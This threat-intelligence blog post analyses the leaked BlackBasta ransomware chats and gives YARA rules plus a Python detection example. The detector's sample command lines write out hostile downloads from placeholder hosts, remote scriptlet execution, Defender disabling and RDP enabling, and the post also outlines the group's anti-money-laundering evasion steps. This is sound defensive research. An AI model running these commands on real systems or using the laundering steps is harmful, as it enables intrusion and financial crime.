April 30, 2025

Unmasking BlackBasta: Inside the Ransomware Syndicate’s Leaked Operations

Ransomware
Inside the BlackBasta Leak: A Rare Look Into Ransomware Operations

On February 11, 2025, an individual operating under the alias “ExploitWhispers” leaked the logs of a Matrix chat used by individuals assessed to be affiliates of the BlackBasta ransomware group. In this blog we break down the key takeaways from the chat logs and share our analysis, along with custom detection rules derived from the insights uncovered.

Key Intelligence from the Leaked Chat Logs

Some of the IP addresses identified in the leak are linked to a known compromise set associated with the threat actor tracked as “Water Barghest.” This group’s botnet is believed to have compromised more than 20,000 IoT devices by exploiting vulnerabilities located through publicly available internet scan databases, then converting those devices into proxies. According to a Trend Micro report, several of these IPs have also been used, knowingly or not, by both advanced persistent threat (APT) groups and cybercriminals.

The leaked chat shows three IP addresses hosted by Hetzner being used as proxies (format: IP;ASN;organization;country):

128.140.36[.]37;AS24940;Hetzner Online GmbH;Germany

157.90.166[.]88;AS24940;Hetzner Online GmbH;Germany

162.55.217[.]30;AS24940;Hetzner Online GmbH;Germany

From an external perspective, activity linked to the group was first observed in late November 2023 by Proofpoint, which identified the use of Latrodectus malware in phishing campaigns. This activity declined toward the end of 2023 and into January 2024, before intensifying again in March 2024.

Figure 1 : Infrastructure map

From an internal perspective, the chat logs show several correlations with the timeline in Proofpoint’s analysis of these IOCs. In late 2023, @usernamegg shared a newly signed malware sample with the team, packaged in a ZIP file named drs1312_signed.zip. Their objective was to bypass antivirus and EDR solutions, though they ran into limitations. The discussions covered detection-evasion strategies such as abusing rundll32.exe to load malicious DLLs and using JavaScript and VBScript files as loaders.

By March 2024 the team had deployed new builds and tested them within their own infrastructure, notably using avcheck[.]net to evaluate how detectable their malware was. By June 2024 they had started routing their operations through SOCKS proxies to further obscure their origin.

They frequently buy and sell credentials on private marketplaces to support the initial-access phase.

Figure 2 : discussion about credential selling between actors

Following an article shared by @usernamegg, the messages exchanged between group members let us identify credentials, including IP addresses, linked to Darkgate and Pikabot activity.

Figure 3 : Discussion about loaders


Based on the chat logs, the members all have defined roles, with @usernamegg acting as their leader.

Figure 4 : organization map

We assess the organizational chart in Figure 4 with medium confidence. For additional context, we recommend the alternative visual representation of BlackBasta’s structure provided by Flare[1].

Tramp was identified by LeMagIT, a French news website, which reconstructed his history from its own archives[2].
While the observed infrastructure may be shared among multiple actors, it also shows notable correlations with the groups Proofpoint tracks as TA577 and TA578.

We assess with moderate confidence that TA577 has been active since 2021 and that it exhibits several similarities to the indicators identified in the leaked chat logs. These include the use of Cobalt Strike from IP address 108.181.132[.]118 and the deployment of the Latrodectus and IcedID malware families, both of which align with patterns observed earlier in this analysis.

TA578, meanwhile, is closely associated with botnet-based operations involving the SSLoad and Bumblebee malware families, both key components of the broader botnet ecosystem. As noted above, infrastructure reuse through open proxies is a common tactic among affiliates and developers, further supporting these connections.

We also observe activity related to Pikabot testing, together with infrastructure that includes IP addresses delivering Pikabot.

Figure 5 : Pikabot tests

The chat also mentions a tool called Brutus, which appears to be used for brute-force tasks and is operated from 45.140.17[.]23, an IP address belonging to Proton66.

Figure 6 : Brutus tool usage

BlackBasta’s Cybercrime Economy: Tactics and Monetization Techniques

This team offers a broad range of services related to malware development and offensive cyber operations, driven primarily by financial gain. Their offerings include FUD (Fully Undetectable) loaders, digital certificates, initial access brokerage, botnet sales, pre-configured server setups, and deployment of the BlackBasta ransomware. Affiliates primarily transact using cryptocurrencies such as Bitcoin, Tether, and Monero.

Figure 7 : Financial scheme

To avoid drawing attention during cryptocurrency transactions, the group follows a set of operational security practices, including:

  • Routinely changing IP addresses via SOCKS proxies when converting Monero to Tether.
  • Creating multiple cryptocurrency wallets, each with its own seed phrase, to prevent clustering by blockchain analytics tools.
  • Using AMLbot to check the risk score of Bitcoin addresses: a score above 70–80% indicates a higher likelihood of triggering anti-money-laundering (AML) alerts. To lower the score, they pass funds through BitcoinBridge combined with a mixer, obscuring the transaction trail.
  • Sending $500 test transactions of high-risk Bitcoin (above 80% AML score) to verify whether a given exchange will accept the funds.

Figure 8 : money laundering scheme

Internal Policies and Threat Actor Behavior Revealed

The leaked chat confirms internal policies on target selection, which align with earlier analysis by LeMagIT. Notably, the individual known as “gg,” also referred to as “Tramp,” was previously reported to have bribed FSB and GRU agents in exchange for protection. Following his arrest, however, his relationship with local authorities appears to have shifted significantly.

Figure 9 : Directives from @usernamegg


The chat also contains discussions about problems with local authorities.

Figure 10 : Discussion about the local authorities

Final Assessment: What the BlackBasta Leak Tells Us About Modern Ransomware Tactics

Based on the contents of the leaked JSON file, the Matrix chat shows that BlackBasta affiliates maintain deep ties to the botnet ecosystem. The infrastructure these ransomware actors rely on, such as proxies and virtual private servers (VPS), has been widely reused across both public and private forums, supporting a range of malicious activities from system compromise to laundering the proceeds.

While the identity and intent of the leaker remain unknown, the data appears to be incomplete, with records ending on September 28, 2024. Nonetheless, the leak provides valuable insight into the operational tactics, organizational structure, and monetization strategies of the BlackBasta group. For technical defenders, the annex includes a set of YARA rules derived from our analysis to assist in threat detection and mitigation.

Are you prepared to respond if a breach like this targets your organization?

At Kudelski Security, our Incident Response Services are designed to help you quickly detect, contain, and recover from cyberattacks—minimizing damage and restoring confidence. Reach out to our team to build or strengthen your response strategy today.

Sources

https://t[.]me/shopotbasta

https://www.justice.gov/archives/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian

https://www.trendmicro.com/en_us/research/24/k/water-barghest.html

https://chatgpt.com/g/g-67b80f8b69f08191923d8e6c3fb929b6-blackbastagpt

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://www.cybercrimediaries.com/post/black-basta-chat-leak-organization-and-infrastructures

https://www.lemagit.fr/actualites/366619807/Ransomware-de-REvil-a-Black-Basta-que-sait-on-de-Tramp

https://flare.io/learn/resources/blog/deciphering-black-bastas-infrastructure-from-the-chat-leak/

https://www.linkedin.com/posts/cebrewer_update-to-the-blackbasta-post-activity-7298746761005711360-iRPc

Annex: YARA rules

The rules below match substrings of command lines and scripts (process-creation telemetry, exported logs, dropped scripts). They are deliberately broad, so tune them against your own baseline before deploying them as alerts.

rule Blackbasta_certutil_LOLBAS_usage {
    meta:
        author = "Kudelski Security"
        description = "Detects certutil.exe being used to download a file and save it to disk in the current folder."
        reference1 = "Blackbasta chat leaks"
        reference2 = "https://lolbas-project.github.io/lolbas/Binaries/Certutil/"
        reference3 = "https://www.linkedin.com/posts/cebrewer_update-to-the-blackbasta-post-activity-7298746761005711360-iRPc"
    strings:
        $executable = "certutil" nocase
        $argument = "-urlcache -split -f" nocase
        $url = "http://" nocase
        $urls = "https://" nocase
    condition:
        $executable and $argument and ($url or $urls)
}

rule Blackbasta_WMIC_LOLBAS_usage {
    meta:
        author = "Kudelski Security"
        description = "Detects WMIC.exe being used to enumerate the antivirus products installed on the current system, as found in the Blackbasta chat leak."
        reference1 = "Blackbasta chat leaks"
        reference2 = "https://www.linkedin.com/posts/cebrewer_update-to-the-blackbasta-post-activity-7298746761005711360-iRPc"
        reference3 = "https://lolbas-project.github.io/lolbas/Binaries/Wmic/"
    strings:
        $executable = "WMIC" nocase
        $argument1 = "/Namespace" nocase
        $argument2 = "AntiVirusProduct" nocase
    condition:
        $executable and $argument1 and $argument2
}

rule Blackbasta_regsvr_LOLBAS_usage {
    meta:
        author = "Kudelski Security"
        description = "Detects regsvr32.exe being used to execute a remote SCT scriptlet through scrobj.dll, as found in the Blackbasta chat leak."
        reference1 = "Blackbasta chat leaks"
        reference2 = "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32"
    strings:
        $executable = "regsvr32" nocase
        $argument1 = "/s" nocase
        $argument2 = ".sct" nocase
        $argument3 = "scrobj.dll" nocase
    condition:
        $executable and $argument1 and $argument2 and $argument3
}

rule Blackbasta_msiexec_LOLBAS_usage {
    meta:
        author = "Kudelski Security"
        description = "Detects msiexec.exe being used to remove software by its product code, as found in the Blackbasta chat leak."
        reference1 = "Blackbasta chat leaks"
        reference2 = "https://lolbas-project.github.io/lolbas/Binaries/Msiexec"
    strings:
        $executable = "msiexec.exe" nocase
        $argument1 = "/x" nocase
        $argument2 = /\{[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}\}/
    condition:
        $executable and $argument1 and $argument2
}

rule Blackbasta_Bitsadmin_LOLBAS_usage {
    meta:
        author = "Kudelski Security"
        description = "Detects bitsadmin.exe being used to download a file, as found in the Blackbasta chat leak."
        reference1 = "Blackbasta chat leaks"
        reference2 = "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin"
    strings:
        $executable = "bitsadmin" nocase
        $argument1 = "/transfer" nocase
        $argument2 = "/download" nocase
        // "/priority" is optional on the command line and is therefore not required
    condition:
        $executable and $argument1 and $argument2
}

rule Blackbasta_wscript_LOLBAS_usage {
    meta:
        author = "Kudelski Security"
        description = "Detects wscript.exe being used to execute JavaScript files, as found in the Blackbasta chat leak."
        reference1 = "Blackbasta chat leaks"
        reference2 = "https://lolbas-project.github.io/lolbas/Binaries/Wscript"
    strings:
        $executable = "wscript" nocase
        $file = ".js" nocase
    condition:
        $executable and $file
}

rule Blackbasta_dotnet_usage {
    meta:
        author = "Kudelski Security"
        description = "Detects dotnet being used to authenticate against an LDAP server, as found in the Blackbasta chat leak."
        reference1 = "Blackbasta chat leaks"
        reference2 = "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/"
    strings:
        $executable = "dotnet" nocase
        $executableexe = "dotnet.exe" nocase
        $argument1 = "-ldaplogin" nocase
        $argument2 = "-controller"
    condition:
        ($executable or $executableexe) and $argument1 and $argument2
}

rule Blackbasta_OneDriveStandaloneUpdater_LOLBAS_usage {
    meta:
        author = "Kudelski Security"
        description = "Detects OneDriveStandaloneUpdater.exe being used to download files, as found in the Blackbasta chat leak."
        reference1 = "Blackbasta chat leaks"
        reference2 = "https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/"
    strings:
        $executable = "psexec" nocase
        $argument1 = "OneDriveStandaloneUpdater.exe" nocase
    condition:
        $executable and $argument1
}

rule Blackbasta_Esentutl_LOLBAS_usage {
    meta:
        author = "Kudelski Security"
        description = "Detects esentutl.exe being used to download malicious files, as found in the Blackbasta chat leak."
        reference1 = "Blackbasta chat leaks"
        reference2 = "https://lolbas-project.github.io/lolbas/Binaries/Esentutl"
    strings:
        $executable = "Esentutl" nocase
        $executableexe = "Esentutl.exe" nocase
        $argument1 = "/y" nocase
        $argument2 = "/d" nocase
    condition:
        ($executable or $executableexe) and $argument1 and $argument2
}

rule Blackbasta_AppInstaller_LOLBAS_usage {
    meta:
        author = "Kudelski Security"
        description = "Detects the ms-appinstaller URI scheme being used to download malicious files, as found in the Blackbasta chat leak."
        reference1 = "Blackbasta chat leaks"
        reference2 = "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller"
    strings:
        $executable = "ms-appinstaller" nocase
        $argument1 = "source=http" nocase
        $argument2 = "source=https" nocase
    condition:
        $executable and ($argument1 or $argument2)
}

rule Blackbasta_netsh_enable_RDP_LOLBAS_usage {
    meta:
        author = "Kudelski Security"
        description = "Detects netsh being used to modify firewall rules and authorize RDP connections, as found in the Blackbasta chat leak."
        reference1 = "Blackbasta chat leaks"
        reference2 = "https://lolbas-project.github.io/lolbas/Binaries/Netsh"
    strings:
        $executable = "netsh" nocase
        $argument1 = "firewall set rule" nocase
        $argument2 = "Remote Desktop" nocase
        $argument3 = "enable=yes" nocase
    condition:
        $executable and $argument1 and $argument2 and $argument3
}

rule Blackbasta_Remote_desktop_enable_via_HKLM_TerminalServer {
    meta:
        author = "Kudelski Security"
        description = "Detects RDP being enabled via reg.exe (fDenyTSConnections set to 0), as found in the Blackbasta chat leak."
        reference1 = "Blackbasta chat leaks"
        reference2 = "https://lolbas-project.github.io/lolbas/Binaries/Reg/"
    strings:
        $executable = "reg" nocase
        $executableexe = "reg.exe" nocase
        $argument1 = "add" nocase
        $argument2 = "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server" nocase
        $argument3 = "/v" nocase
        $argument4 = "fDenyTSConnections" nocase
        $argument5 = "/t REG_DWORD /d 0 /f" nocase
    condition:
        ($executable or $executableexe) and $argument1 and $argument2 and $argument3 and $argument4 and $argument5
}

rule Blackbasta_Remote_desktop_enable_via_HKLM_RDP_Tcp_add {
    meta:
        author = "Kudelski Security"
        description = "Detects Network Level Authentication for RDP being disabled via reg.exe (UserAuthentication set to 0), as found in the Blackbasta chat leak."
        reference1 = "Blackbasta chat leaks"
        reference2 = "https://lolbas-project.github.io/lolbas/Binaries/Reg/"
    strings:
        $executable = "reg" nocase
        $executableexe = "reg.exe" nocase
        $argument1 = "add" nocase
        $argument2 = "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp" nocase
        $argument3 = "/v" nocase
        $argument4 = "UserAuthentication" nocase
        $argument5 = "/t REG_DWORD /d 0 /f" nocase
    condition:
        ($executable or $executableexe) and $argument1 and $argument2 and $argument3 and $argument4 and $argument5
}

rule Blackbasta_veeam_ps1_script {
    meta:
        author = "Kudelski Security"
        description = "Detects the Veeam-Get-Creds.ps1 script, used for quick credential access through privilege escalation on Veeam."
        reference1 = "Blackbasta chat leaks"
        reference2 = "https://osintteam.blog/the-ultimate-black-basta-chat-leak-part-2-veeam-confluence-8b766c2182ac"
    strings:
        // Intended to run over exported Windows process-creation events (Event ID 4688);
        // YARA strings are substring matches, so no wildcard characters are needed.
        $platform = "Win" nocase
        $eventID = "4688"
        $process = "powershell.exe" nocase
        $CommandLine1 = "Veeam-Get-Creds.ps1" nocase
        $commandline2 = "Get-VBR" nocase
    condition:
        $platform and $eventID and $process and ($CommandLine1 or $commandline2)
}

rule Blackbasta_dropping_payload {
    meta:
        author = "Kudelski Security"
        description = "Detects Invoke-WebRequest being used to drop and start a malicious file, as found in the Blackbasta chat leak."
        reference1 = "Blackbasta chat leaks"
        reference2 = "https://osintteam.blog/the-ultimate-black-basta-chat-leak-part-2-veeam-confluence-8b766c2182ac"
    strings:
        $argument1 = "Invoke-WebRequest" nocase
        $argument2 = "-Uri" nocase
        $argument3 = "-OutFile" nocase
        $argument4 = "Start-Process" nocase
    condition:
        $argument1 and $argument2 and $argument3 and $argument4
}

rule Blackbasta_disable_realtime_monitoring {
    meta:
        author = "Kudelski Security"
        description = "Detects PowerShell being used to disable Microsoft Defender real-time monitoring, as found in the Blackbasta chat leak."
        reference1 = "Blackbasta chat leaks"
        reference2 = "https://osintteam.blog/the-ultimate-black-basta-chat-leak-part-2-veeam-confluence-8b766c2182ac"
    strings:
        $argument1 = "-command" nocase
        $argument2 = "Set-MpPreference -DisableRealtimeMonitoring 1" nocase
    condition:
        $argument1 and $argument2
}

rule Blackbasta_uninstall_defender {
    meta:
        author = "Kudelski Security"
        description = "Detects PowerShell being used to uninstall the Windows Defender feature, as found in the Blackbasta chat leak."
        reference1 = "Blackbasta chat leaks"
        reference2 = "https://osintteam.blog/the-ultimate-black-basta-chat-leak-part-2-veeam-confluence-8b766c2182ac"
    strings:
        $argument1 = "Uninstall-WindowsFeature" nocase
        $argument2 = "-Name Windows-Defender" nocase
    condition:
        $argument1 and $argument2
}
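To show how the command-line patterns in the annex behave on process-creation telemetry, the following is an added Python example written for this edit; it is not part of the original post or of the published YARA rules. It re-expresses a subset of the rules as regular expressions and runs them over constructed sample command lines that imitate the CommandLine field of Windows Security Event ID 4688 and Sysmon Event ID 1 records. The sample lines, the rule names and the example.invalid hostnames are all constructed for illustration. Where the YARA substring matching is loose (a bare "reg" also appears inside "regsvr32"), the regexes use word boundaries, and a benign certutil -hashfile line is included to show that the download rule does not fire on ordinary use of the same LOLBin.

```python
"""Command-line detection logic mirroring the LOLBAS rules in the annex.

Constructed example: the sample command lines are not from the leak; they
imitate the CommandLine field of Windows Security Event ID 4688 / Sysmon
Event ID 1 records. Hostnames use the reserved 'example.invalid' domain.
"""
import re
from dataclasses import dataclass
from functools import lru_cache


@dataclass(frozen=True)
class Rule:
    """Every pattern in 'required' must match; if 'any_of' is non-empty,
    at least one of its patterns must match as well."""
    name: str
    required: tuple
    any_of: tuple = ()


@lru_cache(maxsize=None)
def _rx(pattern: str) -> "re.Pattern[str]":
    # Case-insensitive, compiled once per distinct pattern.
    return re.compile(pattern, re.IGNORECASE)


# Regex re-expressions of the annex rules (hypothetical rule names). Word
# boundaries and the optional ".exe" suffix keep "reg add" from matching
# inside "regsvr32", and restrict "regsvr" to regsvr32 itself.
GUID = r"\{[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\}"
RULES = (
    Rule("certutil_download",
         (r"\bcertutil(\.exe)?\b", r"-urlcache\s+-split\s+-f"),
         (r"https?://",)),
    Rule("wmic_av_discovery",
         (r"\bwmic(\.exe)?\b", r"/namespace", r"\bAntiVirusProduct\b")),
    Rule("regsvr32_remote_sct",
         (r"\bregsvr32(\.exe)?\b", r"/s\b", r"\.sct\b", r"\bscrobj\.dll\b")),
    Rule("msiexec_uninstall_by_product_code",
         (r"\bmsiexec(\.exe)?\b", r"/x\b", GUID)),
    Rule("bitsadmin_download",
         (r"\bbitsadmin(\.exe)?\b", r"/transfer\b", r"/download\b")),
    Rule("netsh_enable_rdp_firewall_rule",
         (r"\bnetsh(\.exe)?\b", r"firewall\s+set\s+rule", r"remote desktop", r"enable=yes")),
    Rule("reg_enable_rdp",
         (r"\breg(\.exe)?\s+add\b",
          r"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server",
          r"/v\s+fDenyTSConnections", r"/t\s+REG_DWORD\s+/d\s+0\b")),
    Rule("defender_disable_realtime_monitoring",
         (r"\bSet-MpPreference\b", r"-DisableRealtimeMonitoring\s+(1|\$true)\b")),
)


def evaluate(cmdline: str) -> list:
    """Return the names of every rule that fires on one command line."""
    hits = []
    for rule in RULES:
        if all(_rx(p).search(cmdline) for p in rule.required) and (
            not rule.any_of or any(_rx(p).search(cmdline) for p in rule.any_of)
        ):
            hits.append(rule.name)
    return hits


def scan(lines) -> dict:
    """Map line index -> rule names for every line that hits at least one rule."""
    return {i: hits for i, line in enumerate(lines) if (hits := evaluate(line))}


# Constructed sample telemetry (index 5 is a benign use of certutil).
SAMPLE_COMMAND_LINES = [
    r"certutil.exe -urlcache -split -f http://example.invalid/a.exe a.exe",
    r"wmic /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName",
    r"regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll",
    r'reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    r"powershell.exe -command Set-MpPreference -DisableRealtimeMonitoring 1",
    r"certutil.exe -hashfile C:\Windows\notepad.exe SHA256",
    r"msiexec.exe /x {12345678-1234-1234-1234-123456789ABC} /qn",
    r"bitsadmin /transfer job /download /priority normal http://example.invalid/p.exe C:\Users\Public\p.exe",
    r'netsh advfirewall firewall set rule group="remote desktop" new enable=yes',
]

if __name__ == "__main__":
    for idx, names in scan(SAMPLE_COMMAND_LINES).items():
        print(f"[{idx}] {', '.join(names)}: {SAMPLE_COMMAND_LINES[idx]}")
```

Running the script flags every sample except the certutil -hashfile line. The same approach applies to any exported command-line field; when porting the annex rules to a SIEM, keep the word-boundary anchoring, because substring rules such as "reg" and "/s" generate noise on real endpoints.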

Summary

Tool, botnet or malware mentioned | Details | IOCs
Pikabot | Infrastructure (proxychains) + mention | 66.42.96[.]41, 45.32.194[.]209, 64.176.214[.]231
Darkgate | Infrastructure + mention | 94.228.169[.]123, 94.228.169[.]143, 45.32.222[.]253, 66.42.110[.]147, 88.119.175[.]245
Latrodectus | Infrastructure + mention | 128.140.36[.]37, 157.90.166[.]88, 162.55.217[.]30
Brutus | Infrastructure + mention | 45.140.17[.]23, 45.140.17[.]40, 45.140.17[.]24

Screenshots of the services offered

  • FUD loaders and certificates
  • Initial access sales
  • Botnet sales
  • Pre-configured servers
  • Deployment of the BlackBasta ransomware

[1] https://www.predictagraph.com/graph/snapshot/4f519654-9c80-44fa-a68c-3eb5ea099c4a

[2] https://www.lemagit.fr/actualites/366619807/Ransomware-de-REvil-a-Black-Basta-que-sait-on-de-Tramp
